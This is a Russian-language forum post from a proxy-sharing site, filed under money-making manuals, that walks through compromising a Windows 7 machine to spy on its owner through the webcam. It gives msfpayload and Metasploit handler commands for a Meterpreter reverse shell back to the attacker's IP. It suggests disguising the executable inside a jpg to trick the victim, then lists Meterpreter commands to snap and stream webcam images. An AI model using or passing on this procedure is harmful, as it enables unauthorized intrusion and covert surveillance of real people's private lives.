Ваш ключ: необходима авторизация | MyProxy - бесплатный обменник валидных прокси между пользователями форума.

Подсматриваем через web-камеру

Тема в разделе Мануалы, способы заработать, создана пользователем Bender, 24 июл 2013.

Войдите для ответа
  1. Bender Новорег

    Bender
    Статус:
    Вне сети
    Сообщения:
    78
    Симпатии:
    8
    Регистрация:
    14.06.14
    [​IMG]


    Всем привет!


    Давайте сегодня поговорим об одном из возможных взломов Windows 7, плюс ко всему будем подглядывать через web-камеру.


    Web-камера давным давно стала неотъемлемой частью аппаратного обеспечения компьютера и не важно ноутбук это или стационар. К тому же большой процент пользователей до сих пор используют Windows XP и Windows 7, на которые уязвимостей выше крыши. Ко всему этому можно добавить неумение пользователями настраивать свою ОС, что уже играет немаловажную роль!


    Итак, давайте воспользуемся одной из давно найденных, но до сих пор работающих уязвимостей для Windows 7, которая затрагивает UAC (User Account Control). Он ней вы можете прочитать:


    Windows zero-day flaw bypasses UAC!


    New Windows Vulnerability Bypasses UAC


    Bypassing UAC with User Privilege under Windows Vista/7


    Уязвимость User Account Control (UAC) в Windows 7


    Для начала нам нужно, создать вредоносный исполняемый файл run_me.exe, который в BackTrack создается так, как показано ниже:


    # msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 X > /root/Desktop/run_me.exe


    ● LHOST=192.168.1.5 – IP-адрес атакующего


    ● LPORT=4444 – порт атакующего


    [​IMG]


    Запускаем Metasploit:


    # msfconsole


    Далее вводим команды:


    > use exploit/multi/handler


    > set payload windows/meterpreter/reverse_tcp


    > set lhost 192.168.1.5


    > exploit


    Теперь нам нужно, что пользователь запустил файл run_me.exe. Как это добиться уже другая история, как вариант можно засунуть вредоносный файл в другой файл. Например, скрыть/склеить exe-файл в jpg. Это не единственный вариант, поэтому вооружайтесь googl’ом.


    После того, когда жертва запустит файл, мы получим контроль над системой с привилегиями SYSTEM. Теперь можно делать все, что угодно! Но сейчас будем подсматривать за пользователем.


    Сначала посмотрим, есть ли вообще у него web-камера?


    meterpreter > webcam_list


    1: Logitech Webcam 120


    Да нам повезло! Имеется одна web-камера: Logitech Webcam 120.


    Теперь сделаем снимок:


    meterpreter > webcam_snap


    Так же можно попробовать запустить web-камеру в режиме реального времени. Делается это следующей командой


    meterpreter > run webcam -p /var/www


    После чего откроется браузер и вы будете видеть то, что видит камера. Если браузер не откроется, значит откройте его сами и в адресной строке введите:


    /var/www/webcam.html


    [​IMG][​IMG]
     
    24 июл 2013 #1
Загрузка...
Top